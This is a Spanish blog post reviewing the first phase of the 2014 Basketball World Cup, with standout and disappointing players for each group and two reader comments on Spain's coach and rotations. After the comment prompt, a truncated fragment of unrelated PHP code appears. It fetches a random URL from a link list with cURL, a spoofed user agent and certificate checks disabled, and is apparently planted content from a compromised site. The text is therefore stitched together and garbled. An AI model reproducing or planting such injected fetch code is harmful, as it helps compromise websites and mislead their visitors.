Mundobasket 2014: Ecuador primera fase

03 de September de 2014 por TheDeerHunter

Repasamos brevemente qué ha acontecido durante estas tres primeras jornadas de campeonato. Como podíamos esperar los representantes NBA están teniendo un protagonismo acorde a su talento aunque algunos no han alcanzado su teórico nivel.

Grupo A

España permanece invicta aunque con un calendario inicial muys favorable. Ante Brasil, eso sí, mostraron el nivel dominante que se les presupone hasta la hipotética final. Los carioca van 2-1 empatados con Francia y Serbia pero ya han pasado el difícil trago de enfrentarse a los locales. Todos ellos se clasificarán atendiendo a lo mostrado por Irán y Egipto.

Destacados:

Pau Gasol (ESP):  El mejor jugador del grupo hasta la fecha, máximo anotador y candidato al MVP hasta el momento. Ya dijimos que se le veía fuerte y motivado.
Miroslav Raduljica (SRB): No ha disputado una gran cantidad de minutos pero está anotando y reboteando bien. Su mejor partido, precisamente el más difícil ante Francia.
Anderson Varejao (BRA): El tercer pívot carioca en la rotación pero el que mejor está jugando. El único con nivel defensivo suficiente como plantar cara a las potentes torres españolas.
Boris Diaw (FRA): Un maestro de los intangibles. Su mejor partido fue contra Brasil pero también resultó decisivo ante Serbia.

Decepciones:

Jose Calderón (ESP): Desubicado como escolta. Extraño desacierto en el tiro exterior.
Victor Claver (ESP): Totalmente marginado por Orenga. Al menos estará acostumbrado.
Tiago Splitter (BRA): Mal en los dos compromisos más exigentes que ha disputado su selección. Ridículo ante Pau Gasol.
Evan Fournier (FRA): Eficiencias negativas en los dos partidos críticos. 

Grupo B

Domina Grecia y le sigue Argentina pero en este grupo hemos disfrutado de las mayores convulsiones del campeonato. Senegal ha metido la cabeza en la clasificación ante la debacle de Puerto Rico y veremos si Croacia no se complica la vida. Filipinas también ha dejado buenas sensaciones.

Destacados:

Gorgui Dieng (SEN): Va camino de ser el MVP de la primera fase liderando a unos históricos senegaleses capaces de batir incluso a un equipo a tener en cuenta como Croacia.
Luis Scola (ARG): Excelente. A la mejor versión que le conocemos. Parece que, como Pau, ha llegado en un gran estado de forma y tremendamente motivado.
Pablo Prigioni (ARG): La experiencia al servicio del equipo. Uno de los mejores directores de este campeonato.
Bojan Bogdanovic (CRO): Sólido. Produciendo en muchas facetas aunque con algún altibajo en su nivel de acierto.
Giannis Antetokounmpo (GRE): Muy difícil de superar en los sistemas defensivos helenos y después un recurso de primer orden al contragolpe.
Andrai Blatche (PHI): Máximo reboteador y hombre orquesta de su frágil selección. Estuvo a un pelo de liársela a Croacia.
Jose Barea (PUR): Dejando buenas sensaciones a pesar de estar con pie y medio fuera del campeonato.

Decepciones:

Nick Calathes (GRE): Dirección con más pena que gloria. Uno de los bases que más tienden a perder el bote.
Damjan Rudez (CRO): Mínimo impacto en el juego y tremendamente desacertado.

Grupo C

Apabullante la selección de USA incluso más que la de España, aunque es cierto que sufrieron extraños momentos de incertidumbre ante Turquía y eso que los otomanos no están siendo nada del otro jueves y marchan ahora mismo en negativo. Ukrania prácticamente tiene asegurada su clasificación mientras que la República Dominicana tiene la tiene en su mano tras haber doblegado a los dos peores equipos. Finlandia está decepcionando y Nueva Zelanda ha venido a mostrar su haka y poco más. No va a ser lo mismo que te lo hagan estos que los del rugby.

Destacados:

Anthony Davis (USA): Causando estragos. Ya dijimos que los americanos iban a orientar su juego hacia los interiores. Peleará por el MVP del campeonato.
Kenneth Faried (USA): A base de intensidad arrasa las zonas rivales. Le ha comido la tostada a otros ilustres hombres grandes como Drummond o Cousins.
Francisco García (DOM): Uno de los hombres más destacados de la primera fase, lanzando de 3 como casi nadie. Él y su selección lo están haciendo mucho mejor de lo que esperábamos todos.

Decepciones:

Derrick Rose (USA): Podemos entender que no esté al 100%, no tanto que esté aquí.
DeMar DeRozan (USA): Mal debut que le hizo perder aún más protagonismo. Mucha competencia.
Rudy Gay (USA): Pensábamos que estaba llamado a suplir el papel de Durant o Melo. De momento ni remotamente.
Mason Plumlee (USA): Se veía venir que no iba a rascar bola.
Andre Drummond (USA): En su caso no se veía venir en absoluto.

Grupo D

Invicta Eslovenia aunque sin enamorar. Lituania y Australia han dejado algunas dudas importantes aunque su clasificación no va a peligrar. Mexico será presumiblemente la cuarta, por encima de Angola y Korea, aunque estos dos últimos dejando mejor imagen de lo que indica su casi segura eliminación.

Destacados:

Goran Dragic (SLO): Espectacular. El mejor base de largo de la competición, haciendo de todo y todo bien. Si su selección llegara lejos podría optar al MVP.
Gustavo Ayón (MEX): Reivindicándose como líder de una selección que pasará a la siguiente fase. Impresionante su 9 de 9 ante los líderes.
Aaron Baynes (AUS): Pilar fundamental en los aussies. Muy sólido.

Decepciones:

Dante Exum (AUS): Menudo melón nos colaron. Alguno debe de estar tirándose de los pelos en los EEUU viendo sus primeras actuaciones aquí.
Cameron Bairstow (AUS): Sólo tuvo minutos en el partido ante Korea.

Comenta

2 comentarios a esta entrada

  1. Nacho dice:
    #1

    Bueno, pues hoy me he visto los tres partidos que han puesto.
    Del Serbia-Brasil, nada nuevo y todo interesante. Brasil es un equipo muy serio, Splitter necesita dos hostias más de Pop. Shasa hace con los suyos lo que puede Si le dejan tiempo puede hacer un gran equipo, talento como el mostrado en el tercer cuarto, tienen a raudales, pero no se centran. No encuentran pivot dominante, los aleros no son los de hace dos décadas y Teodosic nunca ha encontrado un grupo ganador. Una pena, pero mola mucho verlos, y te desesperan cuando se cortocircuitan.
    Del Grecia-Croacia: A los croatas les pasa más de lo mismo que a los serbios. Pero tienen más talento, menos en el puesto de 1 y 2. Simon mola, pero para andar por casa. De Ukic mejor no hablar. El trío Bogdanovic, Saric y Tomic no termina de cuajar. El 3 se ha ido a 20 puntos, pero intrascendentes, mal partido el suyo. Aunque tuvo un arranque que pudo haber apretado el choque. Si Grecia no gana a Argentina será aplastada por España en octavos, eso si ganan a Puerto Rico, que está por ver. De Grecia solo puedo decir cosas buenas. Me encanta el equipo y me encanta Katsikaris. Probablemente el plantel con menos talento de los últimos 30 años juega a lo que sabe, y lo hace muy bien. El ex del Bilbao sabe lo que hace. No he visto a Antetoukompo en los Bucks, pero creo que este paso por la selección le va a venir de maravilla. Aunque juegue menos de lo que muchos esperaban. Me ha encantado el detalle de Katsikaris cuando tras un arreón de Croacia con un triple y luego una jugada absurda del de los Bucks donde pierde la bola, pide tiempo, lo sienta a su lado y le hace un gesto de no te preocupes, nada de voces ni de sargento. Me gusta mucho Kaimakouglu. Es como Felipe Reyes con mejor tiro de tres y más visión para el pase, pelea la misma. Y Zisis es muy bueno, pero claro, no se puede comparar con los jugones griegos.
    Del España- Francia… bufff. Son muy buenos, pero con Orenga los yanquis nos dan un repaso de cojones. O están todos enchufados ese día y no acusan cansancio alguno o nos fríen. Porque lo del ¿entrenador? es de coña. Lo de las rotaciones lo ve el más bobo del pueblo. Por ejemplo hoy, Ricky hace unos primeros 7 minuto de escándalo. 4 puntos tres o cuatro asistencias, dos robos y dos pérdidas más forzadas… pero está follao, y tras tiempo muerto francés (el entrenador éste sabe) le cambia al base, Orenga lo mantiene y Diot mete 7 puntos seguidos porque el chaval no puede pasar ni un puto bloqueo. Debe ser que España tiene problemas en el puesto de base!!! xD. Pero nada, hay que jugar 10 min seguidos con el quinteto titular, y Marc y Navarro chuparse 13 o 14 seguidos!! No hablo más de este tipo, porque me enveneno.
    Parece que Croacia o Senegal en octavos, Argentina o Francia en cuartos y Brasil o Grecia en semis es el camino a la final.
    No he visto a EEUU, bueno sí, pero poco. Lo que traen me parece más peligroso para España que si vinieran LeBron, Durant y cía. Entre otras cosas porque eso igual te relaja. porque una defensa con Davis (que brazos tiene el cabrón) arriba y los demás mordiendo, asusta. chungo meter buenos balones dentro si no estás muy inspirado y circulas bien la bola. Y con lo que tienen por fuera como les de a Irving, Curry y Thompson por clavarlas y a Rose y Hardem por pisar la pintura como saben… miedito.
    Supongo, que si se llega a ella, será una final de inspiración de los jugadores, porque es evidente que mister K le da las vueltas a Orenga. A tener en cuenta la adaptación de los yanquis a las reglas FIBA, y no me refiero a los aburridos debates sobre los pasos.

      Citar

  2. TheDeerHunter dice:
    #2

    Puff yo también soy pesimista ante USA viendo las rotaciones de Orenga. No puedo entenderlas ni haciendo todo el esfuerzo del mundo. De momento tiene a más de la mitad de la plantilla desconectada del campeonato y es algo que no se pueden permitir. Algunos están jugando muy bien, pero no parece ser consecuencia del reparto de minutos del técnico si no más bien a su pesar.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>